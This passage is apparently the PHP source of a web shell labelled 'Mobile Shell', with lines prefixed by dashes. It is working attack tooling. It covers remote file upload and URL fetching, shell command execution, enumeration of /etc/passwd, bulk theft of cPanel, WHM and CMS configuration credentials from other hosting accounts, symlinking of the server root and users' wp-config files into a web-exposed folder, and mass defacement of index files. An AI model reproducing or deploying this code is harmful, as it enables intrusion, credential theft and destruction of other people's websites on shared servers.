- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
- echo '<div class="coL-option">';
- echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
- <hr>';
- echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
- <th><a href='?command=edit&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
- <th><a href='?command=rename&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
- <th><a href='?command=chmod&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
- <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
- $source = htmlspecialchars(@file_get_contents($_COEG['file']));
- if(empty($source)) {
- $q1 = 'Source Not Found !!';
- failed1($q1);
- echo x9;
- } else {
- echo "<pre class='top'><code class='php'>".$source."</code></pre>";
- }
- }
- // --- rename file --- //
- elseif($_COEG['command'] == 'rename') {
- if($_COEG['rename']) {
- $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
- if($rename) {
- $q1 = "File Renamed !!";
- $t1 = "?".x5.$dir;
- fauto2($q1, $t1);
- } else {
- $q1 = "Permission Denied !!";
- $t1 = "?".x5.$dir;
- fauto1($q1, $t1);
- }
- }
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">RENAME FILE</td></table></div>';
- echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
- <hr><table>';
- echo "<th><a href='?command=view&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
- <th><a href='?command=edit&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
- <th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
- <th><a href='?command=chmod&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
- <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
- echo "<div class='coL-option top'>
- <br><br><br>
- <center>
- <i class='fa fa-file-o fa-3x'></i></center><br><br>";
- echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
- <table cellspacing='0'>
- <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
- <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
- </form></div>";
- }
- // --- delete file --- //
- elseif($_COEG['command'] == 'delete') {
- $delete = unlink($_COEG['file']);
- if($delete) {
- $q1 = '[ '.basename($_COEG['file']).' ] Deleted !!';
- $t1 = '?'.x5.$dir;
- fauto2($q1, $t1);
- echo x10;
- } else {
- $q1 = 'Permission Denied !!';
- $t1 = '?'.x5.$dir;
- fauto1($q1, $t1);
- echo x8;
- }
- }
- // --- rename directory --- //
- elseif($_COEG['command'] == 'renadir') {
- $c = $_COEG['e'];
- if($_COEG['e']) {
- $e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
- if($e) {
- $q1 = 'Directory Renamed !!';
- $t1 = '?'.x5.dirname($dir);
- fauto2($q1, $t1);
- } else {
- $q = 'Permission Denied !!';
- failed1($alert);
- }
- }
- echo('<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>');
- echo("<div class='coL-option top'>
- <br><br><br>
- <center>
- <i class='fa fa-folder-o fa-3x'></i></center><br><br>");
- echo("<form action='?".x7."renadir&".x5.$dir."' style='margin:0px' method='post'>
- <table cellspacing='0'>
- <td align='center' style='width:10%'><i class='fa fa-folder-o'></i> </td><td style='width:70%'><input type='text' value='".basename($dir)."' name='e'></td><td style='width:20%'>
- <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
- </form></div>");
- }
- // --- delete directory --- //
- elseif($_COEG['command'] == 'deledir') {
- $x0z1 = deledir($dir);
- if($x0z1) {
- echo "<script>window.location = '?".x5.dirname($dir)."';</script>";
- $q1 = 'Success !!';
- success1($q1);
- } else {
- echo "<script>window.location = '?".x5.dirname($dir)."';</script>";
- $q1 = 'Permission Denied !!';
- failed1($q1);
- }
- }
- // --- multiple upload --- //
- elseif($_COEG['command'] == 'upload') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
- if(isset($_REQUEST['ufile'])) {
- $ufile = $_COEG['ufile'] ;
- }
- if(isset($_REQUEST['upload'])) {
- if($_COEG['upload']){
- if(empty($ufile)) {
- $cx = $_FILES['file']['name'];
- } else {
- $cx = $ufile;
- }
- if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
- $q1 ="File Uploaded !!";
- success1($q1); } else {
- $q1 ="Upload Failed !!";
- failed1($q1);
- } } }
- echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
- echo '<form enctype="multipart/form-data" action="?'.x7.'upload&'.x5.$dir.'" method="POST" style="margin:0px">
- <table style="width:100%">
- <td style="width:20%">File :</td>
- <td style="width:80%">
- <input type="file" name="file"></td>
- <tr>
- <td style="width:20%">Name :</td>
- <td style="width:80%"><input name="ufile" type="text" placeholder="" value="" /></td>
- <tr>
- <td style="width:20%"></td>
- <td style="width:80%"><input type="submit" name="upload" style="width:100px" value="Upload" class="btn-exe" />
- </td></table></form></div>';
- if($_COEG["submit"]){
- $uname = $_COEG["uname"];
- $url = trim($_COEG["url"]);
- if($url){
- $file = fopen($url,"rb");
- if($file) {
- $valid_exts = array("css","php","html","htm","txt","zip","rar","png","jpg","jpeg","gif","mp3","mp4","3gp");
- $ext = end(explode(".",strtolower(basename($url))));
- if(in_array($ext,$valid_exts)){
- if(empty($uname)) {
- $filename = basename($url);
- } else {
- $filename = $uname;
- }
- $newfile = fopen($dir.'/'.$filename, "wb");
- if($newfile){
- while(!feof($file)) {
- fwrite($newfile,fread($file,MS7Z), MS7Z); } $q1 ="File Upoaded !!";
- success1($q1); } else {
- $q1 ="Upload Failed !!";
- failed1($q1); } } else { $q1 ="Extension Not Supported !!";
- failed1($q1); } } else { $q1 ="Link Invalid !!";
- failed1($q1); } } else { $q1 ="Link Empty !!";
- failed1($q1); } }
- echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet :<hr>';
- echo '<form action="?'.x7.'upload&'.x5.$dir.'" method="POST">';
- echo '<table style="width:100%">
- <td style="width:20%">Link :</td>
- <td style="width:80%"><input type="text" name="url" placeholder="" style="width:100%"></td>
- <tr>
- <td style="width:20%">Name :</td>
- <td style="width:80%"><input type="text" name="uname" style="width:100%"></td>
- <tr>
- <td style="width:20%"></td><td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" class="btn-exe"></td></table></form>
- </div>';
- }
- // --- system information --- //
- elseif ($_COEG['command'] == 'system') {
- function exe($ms_x) {
- if(function_exists('system')) {
- @ob_start();
- @system($ms_x);
- $ms_z = @ob_get_contents();
- @ob_end_clean();
- return $ms_z;
- } elseif(function_exists('exec')) {
- @exec($ms_x,$values);
- $ms_z = "";
- foreach($values as $value) {
- $ms_z .= $result;
- } return $ms_z;
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($ms_x);
- $ms_z = @ob_get_contents();
- @ob_end_clean();
- return $ms_z;
- } elseif(function_exists('shell_exec')) {
- $ms_z = @shell_exec($ms_x);
- return $ms_z;
- }
- }
- function disk($dz) {
- if($dz >= 1073741824)
- return sprintf('%1.2f',$dz / 1073741824 ).' GB';
- elseif($dz >= 1048576)
- return sprintf('%1.2f',$dz / 1048576 ) .' MB';
- elseif($dz >= 1024)
- return sprintf('%1.2f',$dz / 1024 ) .' KB';
- else
- return $dz .' B';
- }
- function fuck($b_ms, $c_ms, $d_ms){
- if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
- if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
- $a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
- $e_ms = strpos($b_ms, $d_ms, $a_ms);
- $f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
- return $f_ms; }
- if(get_magic_quotes_gpc()) {
- function m_ms($n_ms) {
- return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
- $_COEG = m_ms($_COEG); }
- $safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
- $disablefunc = @ini_get("disable_functions");
- $mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
- $curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
- $wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
- $perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
- $python = (exe('python --help')) ? "
- <span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
- $ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
- if(!function_exists('posix_getegid')) {
- $c_us = @get_current_user();
- $c_id = @getmyuid();
- $g_c = @getmygid();
- $gr_p = "?";
- } else {
- $c_id = @posix_getpwuid(posix_geteuid());
- $g_c = @posix_getgrgid(posix_getegid());
- $c_us = $c_id['name'];
- $c_id = $c_id['uid'];
- $gr_p = $g_c['name'];
- $g_c = $g_c['gid'];
- }
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYSTEM INFORMATION</td></table></div>';
- echo "<table width=100% class='table-info' cellspacing=0>
- <th class=th-info style=width:120px><center>Component</center></th>
- <th class=th-info><center>Arrow</center></th>
- <th class=th-info break><center>Result</center></th></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server </td><td class='td-info' align='center'>»</td>
- <td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Username</td><td class='td-info' align='center'>»</td>
- <td class='td-info'> ".$c_us." [".$c_id."]</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Group</td><td class='td-info' align='center'>»</td>
- <td class='td-info'>".$gr_p." [".$g_c."]</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Server IP </td><td class='td-info' align='center'>»</td>
- <td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Your IP </td><td class='td-info' align='center'>»</td>
- <td class='td-info'> ".$_SERVER['REMOTE_ADDR']."</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- PHP Version</td><td class='td-info' align='center'>»</td>
- <td class='td-info'> ".@phpversion()."</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space</td> <td class='td-info' align='center'>»</td>
- <td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode</td><td class='td-info' align='center'>»</td>
- <td class='td-info'> $safemode</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL</td><td class='td-info' align='center'>»</td><td class='td-info'>$mysql</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
- Perl</td><td class='td-info' align='center'>»</td>
- <td class='td-info'> $perl </td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python</td><td class='td-info' align='center'>»</td>
- <td class='td-info'>$python</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET</td><td class='td-info' align='center'>»</td>
- <td class='td-info'>$wget</td></tr>";
- echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL</td><td class='td-info' align='center'>»</td><td class='td-info'>$curl</td></tr>";
- if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
- echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes </td><td class='td-info' align='center'>»</td>
- <td><span class='label label-success'>ON</span></tr>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes </td><td class='td-info' align='center'>»</td><td class='td-info'><span class='label label-danger'>OFF</span></td></tr>"; }
- echo "</table>";
- echo '<div class="coL-panel top"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">KERNEL</td></table></div>';
- echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".php_uname()."</div>";
- echo '<div class="coL-panel top"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">DISABLE FUNCTION</td></table></div>';
- echo "<div class='coL-option' style='padding:7px'>".$ds_men."</div>";
- }
- // --- jumping server --- //
- elseif($_COEG['command'] == 'jumping') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">JUMPING SERVER</td></table></div>';
- $i = 0;
- $s_a = fopen("/etc/passwd", "r");
- while($s_b = fgets($s_a)) {
- if($s_b == '' || !$s_a) {
- $q1 = "Can't Read [ /etc/passwd ]";
- $t1 = "?".x5.$dir;
- fauto1($q1, $t1);
- echo x9;
- } else {
- preg_match_all('/(.*?):x:/', $s_b, $s_c);
- foreach($s_c[1] as $s_d) {
- $s_e = "/home/$s_d/public_html";
- if(is_readable($s_e)) {
- $i++;
- $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-file'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> <a href='?dir=$s_e'>[ $s_d ]</a></td>";
- if(is_writable($s_e)) {
- $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-info'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'>
- <a href='?dir=$s_e'><font color='red'>[ $s_d ]</font></a></td>";
- }
- echo $s_o;
- $s_k = file_get_contents("/etc/named.conf");
- if($s_k == '') {
- $q1 = "Server Not Found !!";
- $t1 = "?".x5.$dir;
- fauto1($q1, $t1);
- echo x9;
- } else {
- preg_match_all("#/var/named/(.*?).db#", $s_k, $s_v);
- foreach($s_v[1] as $s_x) {
- $s_g = posix_getpwuid(@fileowner("/etc/valiases/$s_x"));
- $s_g = $s_g['name'];
- if($s_g == $s_d) {
- echo "<td class='td-info'><a href='http://$s_x'>http://$s_x</a> </td></table>"; break;}}}}}}}
- if($i == 0) {
- $q1 = "Server Not Found !!";
- $t1 = "?".x5.$dir;
- fauto1($q1, $t1);
- echo x9;
- } else {
- echo "<div class='coL-option top'>Total : <span class='label label-default'> ".$i." <span></div>";
- }
- }
- // --- config grabber --- //
- elseif($_COEG['command'] == 'config') {
- $s_t = fopen("/etc/passwd", "r");
- $s_z = mkdir("underxploit-config", 0777);
- $s_s = "Options all\
- Require None\
- Satisfy Any";
- $s_d = fopen("underxploit-config/.htaccess","w");
- fwrite($s_d, $s_s);
- while($s_q = fgets($s_t)) {
- if($s_q == "" || !$s_t) {
- $q1 = 'Can\'t Read etc/passwd !!';
- failed1($q1);
- } else {
- preg_match_all('/(.*?):x:/', $s_q, $s_y);
- foreach($s_y[1] as $s_p) {
- $s_k = "/home/$s_p/public_html/";
- if(is_readable($s_k)) {
- $s_g = array(
- "/home/$s_p/.my.cnf" => "cpanel",
- "/home/$s_p/.accesshash" => "WHM-accesshash",
- "/home/$s_p/public_html/bw-configs/config.ini" => "BosWeb",
- "/home/$s_p/public_html/config/koneksi.php" => "Lokomedia",
- "/home/$s_p/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
- "/home/$s_p/public_html/clientarea/configuration.php" => "WHMCS",
- "/home/$s_p/public_html/whm/configuration.php" => "WHMCS",
- "/home/$s_p/public_html/whmcs/configuration.php" => "WHMCS",
- "/home/$s_p/public_html/forum/config.php" => "phpBB",
- "/home/$s_p/public_html/sites/default/settings.php" => "Drupal",
- "/home/$s_p/public_html/config/settings.inc.php" => "PrestaShop",
- "/home/$s_p/public_html/app/etc/local.xml" => "Magento",
- "/home/$s_p/public_html/joomla/configuration.php" => "Joomla",
- "/home/$s_p/public_html/configuration.php" => "Joomla",
- "/home/$s_p/public_html/wp/wp-config.php" => "WordPress",
- "/home/$s_p/public_html/wordpress/wp-config.php" => "WordPress",
- "/home/$s_p/public_html/wp-config.php" => "WordPress",
- "/home/$s_p/public_html/admin/config.php" => "OpenCart",
- "/home/$s_p/public_html/slconfig.php" => "Sitelok",
- "/home/$s_p/public_html/application/config/database.php" => "Ellislab");
- foreach($s_g as $s_h => $s_l) {
- $s_r = file_get_contents($s_h);
- if($s_r == '') {
- } else {
- $fcS = fopen("underxploit-config/$s_p-$s_l.txt","w");
- fputs($fcS,$s_r);
- }}}}}}
- $q1 = "OK !!";
- $t1 = "?".x5.$dir."/underxploit-config";
- fauto2($q1, $t1);
- echo x10;
- }
- // --- file grabber --- //
- elseif($_COEG['command'] == 'filegrab') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">FILE GRABBER</td></table></div>';
- if($_COEG['grab']) {
- $name = $_COEG['name'];
- $rz = $_COEG['link'];
- $x = file_get_contents($rz);
- if(empty($x)) {
- $q1 = 'Can\'t Grab File !!';
- failed1($q1);
- } else { $q1 = 'Done !!';
- success1($q1);
- $fp = fopen($dir."/".$name, "w");
- fwrite($fp, $x);
- fclose($fp);
- echo '<meta http-equiv="Refresh" content="0; URL=?dir='.$dir.'">'; } }
- echo "<div class='coL-option top'>
- File Grabber :<hr>
- <form action='?".x7."filegrab&".x5.$dir."' method='post'>
- <table cellspacing='0'>
- <td style='width:20%'>Link :</td><td style='width:80%'>
- <input type='text' value='' name='link' style='width:100%'></td><tr>
- <td style='width:20%'>Name :</td><td style='width:80%'>
- <input type='text' value='' id='name' name='name' style='width:100%'></td><tr>
- <td style='width:20%'></td><td style='width:80%'>
- <input type='submit' onclick='saveForm();return false;' class='btn-exe' value='Grab It !' name='grab' style='width:100px'></td></table></form></div>";
- echo '<script>function saveForm(){
- if(document.getElementById("name").value == ""){
- $.alert ({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "Can\'t Be Empty !!",
- theme: "Dark",
- type: "red",
- });
- return false;
- }
- document.getElementById("sks").submit();
- }
- </script>';
- }
- // --- cpanel finder --- //
- elseif($_COEG['command'] == 'cpanel') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CPANEL FINDER</td></table></div>';
- @ini_set('display_errors',0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains) {
- $domains = scandir("/var/named");
- if($domains) {
- echo "<table class='table-info' style='width:100%'><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center></th></tr>";
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr>
- <td class='td-info' style='width:150px'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td>
- <td class='td-info'><a class='a' href='".$owner['name'].".txt' target='_blank'>OPEN</a></td></tr>";
- $dc++; }}}
- echo '</table>';
- $total = $dc;
- echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
- }else{
- $d0mains = @file('/etc/named.conf');
- if($d0mains) {
- echo "<table class='table-info' style='width:100%'><tr><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center> </th></tr>";
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone',$d0main)){
- preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){
- $mck[] = $domain[1][0];
- } } }
- $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) {
- $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- }
- array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) {
- $r = explode(':',$d);
- if(strpos($r[5],'home')) {
- $passwd[$r[0]] = $r[5];
- }
- }
- $l=0;
- $j=1;
- foreach($usr as $r) {
- $dirz = '/home/'.$r.'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, $path.'/'.$r.'.txt');
- $p=file_get_contents($path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr>
- <td class='td-info'><a target='_blank' href=http://".$dmn[$j-1]."/>".$dmn[$j-1]." </a></td>
- <td class='td-info'><a href='".$r.".txt'>OPEN</a> </center></td></tr>";
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
- }
- } else{
- $q1 = 'Access Disabled !!';
- $t1 = '?'.x5.$dir;
- fauto1($q1, $t1);
- echo x9;
- }
- }
- // --- mass deface --- //
- elseif ($_COEG['command'] == 'massdef') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MASS DEFACE</td></table></div>';
- echo '<div class="coL-option">';
- echo "<form action='?".x7."massdef&".x5.$dir."' method='post'>";
- echo "<table cellspacing='0'>
- <td align='left' style='padding:7px;width:60px'>
- Root :</td><td><input type='text' name='base_dir' style='width:100%' value='".getcwd()."'></td></tr>";
- echo "<tr><td align='left' style='padding:7px;width:60px'>File :</td><td> <input type='text' name='file_name' value='index.php' style='width:100%' placeholder=''></td></tr></table>";
- echo "<br>Source :<br><br>
- <textarea name='index'># Hacked By Wildan Izzudin !!</textarea>";
- echo "<input type='submit' value='CROT' class='btn-exe' style='width:100%;margin-top:3px'></form></center></div>";
- if (isset ($_COEG['base_dir']))
- {
- if (!file_exists ($_COEG['base_dir'])) {
- $alert = "Destination Not Found !";
- failed1($alert); }
- @chdir ($_COEG['base_dir']) or die ("<script>alert('Cannot Open Directory');</script>");
- $files = @scandir ($_COEG['base_dir']) or die ("Oh Shit !!<br>");
- foreach ($files as $file):
- if ($file != "." && $file != ".." && @filetype ($file) == "dir")
- {
- $index = getcwd ()."/".$file."/".$_COEG['file_name'];
- if (file_put_contents ($index, $_COEG['index']))
- echo "
- <div class='coL-option' style='margin-top:2px;margin-bottom:2px'><span class='label-default'>+</span> $index </span></div>"; }
- endforeach;
- }
- }
- // --- md5 creator --- //
- elseif($_COEG['command'] == 'md5') {
- echo('<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MD5 CREATOR</td></table></div>');
- if($_COEG['encrypt']) {
- $text = $_COEG['text'];
- $md5 = md5($text);
- if($md5) {
- echo("<div class='coL-option top'><table style='margin-bottom:3px'>
- <td class='td-md5' style='width:60px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$text."</td><tr><td class='td-md5' style='width:60px'><font color='#1D9D73'>+</font> MD5 :</td><td class='break'> ".$md5."</td></table></div>"); } else {
- $alert = 'Permission Denied !!';
- failed($alert);
- }
- }
- echo("<div class='coL-option top'>
- <form action='?".x7."md5&".x5.$dir."' method='post'>
- <table style='width:100%'>
- <td style='width:20%'>Text :</td><td style='width:80%'>
- <input type='text' name='text' style='width:100%'>
- </td><tr><td style='width:20%'></td><td style='width:80%'>
- <input type='submit' value='Create' name='encrypt' class='btn-exe' style='width:100px'></td></table></form></div>");
- }
- // --- multi symlink --- //
- elseif($_COEG['command'] == 'symlink') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MULTI SYMLINK</td></table></div>';
- if(is_readable("/etc/named.conf")) {
- $named = '<a href="?symlink=named.conf&dir='.$dir.'">OPEN</a>';
- } else {
- $named = '<font color="red">DISABLED</font>';
- }
- if(is_readable("/etc/valiases")) {
- $valiases = '<a href="?symlink=valiases&dir='.$dir.'">OPEN</a>';
- } else {
- $valiases = '<font color="red">DISABLED</font>';
- }
- if(is_readable("/etc/passwd")){
- $passwd = '<a href="?symlink=passwd&dir='.$dir.'">OPEN</a>';
- } else {
- $passwd = '<font color="red">DISABLED</font>';
- }
- if(is_readable("/var/named")){
- $var = '<a href="?symlink=var&dir='.$dir.'">OPEN</a>';
- } else {
- $var = '<font color="red">DISABLED</font>';
- }
- echo '<table class="table-info">';
- echo '<th class="th-info">From</th>';
- echo '<th class="th-info">Arrow</th>';
- echo '<th class="th-info">Action</th>';
- echo '<tr>';
- echo '<td class="td-info"><span class="label-default">+</span> [ /etc/named.conf ]</td><td class="td-info"><center>»</center></td><td class="td-info"><center>'.$named.'</a></center></td>';
- echo '<tr>';
- echo '<td class="td-info"><span class="label-default">+</span> [ /etc/valiases ]</td><td class="td-info""><center>»</center></td><td class="td-info"><center>'.$valiases.'</a></center></td>';
- echo '<tr>';
- echo '<td class="td-info"><span class="label-default">+</span> [ /etc/passwd ]</td><td class="td-info"><center>»</center></td><td class="td-info"><center>'.$passwd.'</a></center></td>';
- echo '<tr>';
- echo '<td class="td-info"><span class="label-default">+</span> [ /var/named/ ]</td><td class="td-info"><center>»</center></td><td class="td-info"><center>'.$var.'</a></center></td>';
- echo '</table>';
- @mkdir('pee',0777);
- @symlink("/","pee/root");
- $htaccss = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- file_put_contents("pee/.htaccess",$htaccss);
- $ms_2 = file_get_contents("/etc/passwd");
- $ms_2z = explode("\n",$ms_2);
- foreach($ms_2z as $ms_3){
- $ms_1 = explode(":",$ms_3);
- error_reporting(0);
- $ms_4 = posix_getcwd();
- $dr = explode("/",$ms_4);
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/blog/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/config.php',"pee/".$ms_1[0].'-PhpBB.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/config.php',"pee/".$ms_1[0].'-vBulletin.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/web/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/joomla/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/conf_global.php',"pee/".$ms_1[0].'-IPB.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/inc/config.php',"pee/".$ms_1[0].'-MyBB.txt');
